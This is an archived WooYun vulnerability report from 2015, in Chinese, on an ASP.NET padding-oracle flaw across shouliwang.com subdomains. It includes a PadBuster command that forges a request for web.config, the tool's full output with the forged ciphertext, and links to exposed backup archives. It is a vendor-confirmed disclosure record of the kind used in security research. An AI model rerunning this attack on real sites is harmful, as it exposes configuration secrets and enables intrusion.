乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-06-02: 细节已通知厂商并且等待厂商处理中 2015-06-03: 厂商已经确认,细节仅向厂商公开 2015-06-13: 细节向核心白帽子及相关领域专家公开 2015-06-23: 细节向普通白帽子公开 2015-07-03: 细节向实习白帽子公开 2015-07-18: 细节向公众公开
**
http://bbs.shouliwang.com/WebResource.axd?d=1433135288http://fz.shouliwang.com/WebResource.axd?d=1433137211http://my.shouliwang.com/WebResource.axd?d=1433135193http://pic.shouliwang.com/WebResource.axd?d=1433135962http://shouliwang.com/WebResource.axd?d=1433135132http://wys.shouliwang.com/WebResource.axd?d=1433137108http://www.shouliwang.com/WebResource.axd?d=1433135907
均存在已主站为例:
C:\>2.pl http://www.shouliwang.com/WebResource.axd?d=9MBwmxN6TLKjC8S3CdFGyw2 9MBwmxN6TLKjC8S3CdFGyw2 16 -encoding 3 -plaintext "|||~/web.config"+-------------------------------------------+| PadBuster - v0.3 || Brian Holyfield - Gotham Digital Science || [email protected] |+-------------------------------------------+INFO: The original request returned the following[+] Status: 500[+] Location: N/A[+] Content Length: 5013INFO: Starting PadBuster Encrypt Mode[+] Number of Blocks: 1INFO: No error string was provided...starting response analysis*** Response Analysis Complete ***The following response signatures were returned:-------------------------------------------------------ID# Freq Status Length Location-------------------------------------------------------1 1 500 3877 N/A2 ** 255 500 5013 N/A-------------------------------------------------------Enter an ID that matches the error conditionNOTE: The ID# marked with ** is recommended : 2Continuing test with selection 2[+] Success: (20) [Byte 16][+] Success: (141) [Byte 15][+] Success: (95) [Byte 14][+] Success: (121) [Byte 13][+] Success: (209) [Byte 12][+] Success: (136) [Byte 11][+] Success: (250) [Byte 10][+] Success: (207) [Byte 9][+] Success: (136) [Byte 8][+] Success: (241) [Byte 7][+] Success: (83) [Byte 6][+] Success: (139) [Byte 5][+] Success: (38) [Byte 4][+] Success: (184) [Byte 3][+] Success: (66) [Byte 2][+] Success: (198) [Byte 1]Block 1 Results:[+] New Cipher Text (HEX): aa31ca55a82f9ee3e99ee1ba1b35e814[+] Intermediate Bytes (HEX): d64db62b8758fb81c7fd8ed47d5c8f15-------------------------------------------------------** Finished ***[+] Encrypted value is: qjHKVagvnuPpnuG6GzXoFAAAAAAAAAAAAAAAAAAAAAA1-------------------------------------------------------
获得第一层秘钥为qjHKVagvnuPpnuG6GzXoFAAAAAAAAAAAAAAAAAAAAAA1获取第二层的时候比较慢,我就不跑了
附带两处下载:◾http://pic.shouliwang.com/giftimages.zip◾http://bbs.shouliwang.com/bbs.rar
危害等级:高
漏洞Rank:18
确认时间:2015-06-03 10:36
谢谢
暂无